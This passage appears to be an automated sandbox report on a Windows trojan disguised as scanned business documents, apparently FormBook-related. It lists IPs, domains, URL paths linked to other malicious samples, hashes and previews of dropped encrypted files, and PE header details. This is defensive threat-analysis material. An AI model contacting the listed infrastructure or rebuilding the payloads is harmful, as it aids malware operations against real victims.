                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@16/10
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 50
                                                    • Number of non-executed functions: 291
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target MHFAGZiftf.exe, PID 2872 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • VT rate limit hit for: Scanned Docs from Emnes Metal Sdn Bhd_.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    09:31:39API Interceptor10700167x Sleep call for process: schtasks.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    217.116.0.191HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/i4bw/
                                                    Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/zd4t/
                                                    D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/7ffx/
                                                    REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/7ffx/
                                                    pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/xu8t/
                                                    RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/zd4t/
                                                    CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                    • www.lecoinsa.net/xu8t/
                                                    Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
                                                    fJXbhkbAh4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
                                                    Image_0000384757.vbsGet hashmaliciousFormBookBrowse
                                                    • www.metabolomicsrubio.com/nbys/?bj=s1S3SPgRNf7lMN0xl2vbADF7xYqfipWGAgii2Z+ocbhr7l7z1f11h4s+9phUKVtapv+G0obo8tHeZk2i1iFboqWmw/7EeLn68w==&kfh=KmQsQQxqanX
                                                    76.223.67.189SecuriteInfo.com.Win32.RATX-gen.24742.674.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.stellardaysigning.com/xb5p/
                                                    mtTw7o41OC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.microsofr.fun/omnp/
                                                    Payrol list.exeGet hashmaliciousFormBookBrowse
                                                    • www.rtrpodcast.online/g3rq/
                                                    LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.magnauniversity.com/hfhf/?6lBX5p6=A/Xwur6vfkk1nt0HF5vI+iD3HQmsBnVKlXfi47Zpsj5D+hS3O7IepQPDfrVs1xyfsUFv&Kjsl=FbuD_t_HwtJdin
                                                    IIMG_00172424.exeGet hashmaliciousFormBookBrowse
                                                    • www.stellardaysigning.com/xb5p/
                                                    eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                    • mgsdaigou2.com/
                                                    gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                    • kensingtonconfectionery.com/
                                                    bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                                                    • tmjsleepmilwakuee.com/
                                                    SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exeGet hashmaliciousFormBookBrowse
                                                    • www.stellardaysigning.com/xb5p/
                                                    Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                    • www.funnelkakes.com/sgjw/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.mqmsqkw.lolPayrol list.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    New Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 116.213.43.190
                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    payment advice.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    new order.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    www.lfghtko.lolPTT request form.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    PTT quotation form.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    Required quotations data list.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.20907.8920.exeGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190
                                                    HILCORP ENERGY REQUESTS.zipGet hashmaliciousFormBookBrowse
                                                    • 116.213.43.190

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    AMAZON-02USUjCrfOAkJJiZyZh.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 75.2.115.196
                                                    vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                    • 54.244.188.177
                                                    .exeGet hashmaliciousUnknownBrowse
                                                    • 52.42.85.34
                                                    http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                    • 35.165.37.251
                                                    https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3DGet hashmaliciousUnknownBrowse
                                                    • 99.81.213.111
                                                    CV.vbsGet hashmaliciousXmrigBrowse
                                                    • 3.6.115.64
                                                    unLc6VekkL.elfGet hashmaliciousMiraiBrowse
                                                    • 35.160.185.9
                                                    17nDkQW4tK.elfGet hashmaliciousMiraiBrowse
                                                    • 54.183.174.200
                                                    2PQz3l61Pc.elfGet hashmaliciousMiraiBrowse
                                                    • 13.236.43.129
                                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 50.18.22.244
                                                    COGENT-174USpayment copy pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 154.41.249.2
                                                    Yg4Sqy06Al.exeGet hashmaliciousFormBookBrowse
                                                    • 38.47.158.160
                                                    http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3DGet hashmaliciousUnknownBrowse
                                                    • 38.180.80.71
                                                    17nDkQW4tK.elfGet hashmaliciousMiraiBrowse
                                                    • 38.148.41.21
                                                    MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                                    • 149.102.143.109
                                                    .5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                    • 38.192.195.53
                                                    66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                                    • 38.180.132.96
                                                    66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                                    • 38.180.132.96
                                                    Urq5Bp4bgs.elfGet hashmaliciousUnknownBrowse
                                                    • 74.63.92.214
                                                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                    • 38.180.132.96
                                                    ACENS_ASSpainHostinghousingandVPNservicesESb2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                                                    • 217.116.5.231
                                                    5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                                    • 82.194.91.200
                                                    HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                                    • 217.116.0.191
                                                    file.exeGet hashmaliciousSystemBCBrowse
                                                    • 217.116.0.152
                                                    VNPT-AS-VNVNPTCorpVNpayment copy pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.55.124
                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.49.193
                                                    Yg4Sqy06Al.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.43.228
                                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 14.254.239.106
                                                    payment voucher.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.41.190
                                                    Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.46.201
                                                    wKrQaAEaJ4.elfGet hashmaliciousMiraiBrowse
                                                    • 113.166.232.238
                                                    nblbw9JYDM.elfGet hashmaliciousMiraiBrowse
                                                    • 123.31.16.73
                                                    Payment ConfirmationSwift copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 203.161.42.162
                                                    Shipping documentsInvoice and Packing List, Certificate of Origin.exeGet hashmaliciousFormBookBrowse
                                                    • 203.161.42.162

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\Clinton

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:ASCII text, with very long lines (28674), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):28674
                                                    Entropy (8bit):3.579135792364548
                                                    Encrypted:false
                                                    SSDEEP:768:XBQPkzXIfqkY4G04QhBgn2RDAmj0zC8xlOWw73Oy3K:wkcfqp4G04QhBc2FAk0XcC
                                                    MD5:61B2F60056D28ACEECBBF21323FF622B
                                                    SHA1:ADB2CA1461EDA74CA0111BE2FDD164BC92A71C62
                                                    SHA-256:1C49DD091F754EE65DF72744AC2345BAEE85E762E9DB2F0C70BC1E650566EF63
                                                    SHA-512:F7E193CB90EAE4C2741F58CA6A4C7261BBAA8665DC94561C958DBB48693E55143AC8A7589EC5E24A20B1FC56B29F1569BEF7C04DBCB6EAE57E95886E78916ABB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=

                                                    C:\Users\user\AppData\Local\Temp\aut8DF2.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:zlib compressed data
                                                    Category:dropped
                                                    Size (bytes):271872
                                                    Entropy (8bit):7.99060672802885
                                                    Encrypted:true
                                                    SSDEEP:6144:93/gG9wXSsQIWyhZDcnx8GcGoxzmEjEtPSgkyHbP1KPNsnmTM/h/NTAP6XjagH:laXvQIThZyx89RxzmEjAwN2/hVamf
                                                    MD5:4269DE07B6806167BCB06EBB374AF6C9
                                                    SHA1:012FB1FB34124ED9DC7FFBB55CC50640F27BF632
                                                    SHA-256:C12C30FED87A5BD875A3E3FBD14A02FA1E312D90BC4B3B959E1699EB01723BF8
                                                    SHA-512:4647F9A8AA0970BFA294BE6AB4135B00150A74CC5A20A4FB6B3C9F6C2AB7B5FE622403CE3F87679E976369E9735166750A0050BDCEF0BBF825C9D028805F2379
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...f.CKQIk..\.....QJ..}@P..KQI365UCX4CCKQI365UCX4CCKQI365.CX4M\._I.?.t.Yx.b.9 @.E',?F".k2(]XZ!c:Qc1>?iZX......,/4g>;?qCX4CCKQ02?.h#?.~#,.tSQ.O...y#,.S...i#?.Y..uSQ..*;\~#,.I365UCX4..KQ.275D.AbCCKQI365.CZ5HB@QI'25UCX4CCKQY'65USX4CsOQI3v5USX4CAKQO365UCX4ECKQI365Us\4CAKQI365WC..CC[QI#65UCH4CSKQI365ECX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365{7=L7CKQ-!25USX4CWOQI#65UCX4CCKQI365uCXTCCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4

                                                    C:\Users\user\AppData\Local\Temp\aut8E22.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):9750
                                                    Entropy (8bit):7.650119562068247
                                                    Encrypted:false
                                                    SSDEEP:192:ekTYCxDR8l9LfBjZ/YiWQdLqBMhGuErhTGMjsHAR3zWdwcqA1WWE9:5T19WLxZ/YjQLqQPErhTGMZRDA1Fu
                                                    MD5:A27A9898EB223CF556D148FAAE7B79DE
                                                    SHA1:A1299150BA464E44A9220FABB93157B7EE69C62B
                                                    SHA-256:946EB2385D1CF442B627C7CCAE2CA9F084A5DE02AA1DB517671589BDD9B46F20
                                                    SHA-512:469CC7F01C8E98420DEF30DA2EBBF0E4786F97466B960C96154CAEEC52C1DCEF49D5BB81E94A8F5776FA3B8758322ADD7BE2E3B2703E90B68133F1FBC4CE7496
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3|v...G.9..&.8_..uh..i|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.|...B3....@.;=.X...f.....H........g....M.S.T..h...

                                                    C:\Users\user\AppData\Local\Temp\j0941BH0

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\schtasks.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\phagocytosed

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:zlib compressed data
                                                    Category:dropped
                                                    Size (bytes):271872
                                                    Entropy (8bit):7.99060672802885
                                                    Encrypted:true
                                                    SSDEEP:6144:93/gG9wXSsQIWyhZDcnx8GcGoxzmEjEtPSgkyHbP1KPNsnmTM/h/NTAP6XjagH:laXvQIThZyx89RxzmEjAwN2/hVamf
                                                    MD5:4269DE07B6806167BCB06EBB374AF6C9
                                                    SHA1:012FB1FB34124ED9DC7FFBB55CC50640F27BF632
                                                    SHA-256:C12C30FED87A5BD875A3E3FBD14A02FA1E312D90BC4B3B959E1699EB01723BF8
                                                    SHA-512:4647F9A8AA0970BFA294BE6AB4135B00150A74CC5A20A4FB6B3C9F6C2AB7B5FE622403CE3F87679E976369E9735166750A0050BDCEF0BBF825C9D028805F2379
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...f.CKQIk..\.....QJ..}@P..KQI365UCX4CCKQI365UCX4CCKQI365.CX4M\._I.?.t.Yx.b.9 @.E',?F".k2(]XZ!c:Qc1>?iZX......,/4g>;?qCX4CCKQ02?.h#?.~#,.tSQ.O...y#,.S...i#?.Y..uSQ..*;\~#,.I365UCX4..KQ.275D.AbCCKQI365.CZ5HB@QI'25UCX4CCKQY'65USX4CsOQI3v5USX4CAKQO365UCX4ECKQI365Us\4CAKQI365WC..CC[QI#65UCH4CSKQI365ECX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365{7=L7CKQ-!25USX4CWOQI#65UCX4CCKQI365uCXTCCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.186205860358144
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File size:1'261'056 bytes
                                                    MD5:75d0bfd0499f3bb0c94a45a80e92476b
                                                    SHA1:af86c882a44b250a8dc8a3c116eee075351740d0
                                                    SHA256:b12b14169932a016209c31797d3a3d18a151f15615e9dc7345d36498fb7e6d07
                                                    SHA512:826c5defe65e4ecc7092c6535374809c237e445dd4992ea6ee2a81d7cf374067212233a726bf0e18950285217829a393f7ba4bd9dec710c6225795d0b290c09c
                                                    SSDEEP:24576:PqDEvCTbMWu7rQYlBQcBiT6rprG8a871bqS1s28SanAq:PTvC/MTQYxsWR7a871eZA
                                                    TLSH:3245C00273D1D022FF9B91734B5AF6115ABC6E660123E61F13982D79BE701B1163E7A3
                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                    File Icon

                                                    Icon Hash:6142420142183038

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x420577
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66AACABC [Wed Jul 31 23:37:32 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F6A7903E503h
                                                    jmp 00007F6A7903DE0Fh
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F6A7903DFEDh
                                                    mov dword ptr [esi], 0049FDF0h
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                    mov dword ptr [ecx], 0049FDF0h
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F6A7903DFBAh
                                                    mov dword ptr [esi], 0049FE0Ch
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                    mov dword ptr [ecx], 0049FE0Ch
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    and dword ptr [eax], 00000000h
                                                    and dword ptr [eax+04h], 00000000h
                                                    push eax
                                                    mov eax, dword ptr [ebp+08h]
                                                    add eax, 04h
                                                    push eax
                                                    call 00007F6A79040BADh
                                                    pop ecx
                                                    pop ecx
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    lea eax, dword ptr [ecx+04h]
                                                    mov dword ptr [ecx], 0049FDD0h
                                                    push eax
                                                    call 00007F6A79040BF8h
                                                    pop ecx
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    push eax
                                                    call 00007F6A79040BE1h
                                                    test byte ptr [ebp+08h], 00000001h
                                                    pop ecx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5d37c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1320000x7594.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
